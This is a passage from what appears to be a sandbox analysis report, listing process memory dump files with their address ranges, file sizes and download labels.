Filesize
4KB

Download
memory/4744-272-0x00000000009F0000-0x0000000000A0E000-memory.dmp

Filesize
120KB

Download
memory/4840-285-0x0000000002710000-0x0000000002770000-memory.dmp

Filesize
384KB

Download
memory/4988-304-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/5156-338-0x0000000076E00000-0x0000000077015000-memory.dmp

Filesize
2.1MB

Download
memory/5156-315-0x0000000002D40000-0x0000000002D41000-memory.dmp

Filesize
4KB

Download
memory/5156-356-0x0000000072770000-0x00000000727F9000-memory.dmp

Filesize
548KB

Download
memory/5356-318-0x0000000000400000-0x0000000000893000-memory.dmp

Filesize
4.6MB

Download
memory/5356-365-0x0000000000C3C000-0x0000000000C8C000-memory.dmp

Filesize
320KB

Download
memory/5356-367-0x0000000000400000-0x0000000000893000-memory.dmp

Filesize
4.6MB

Download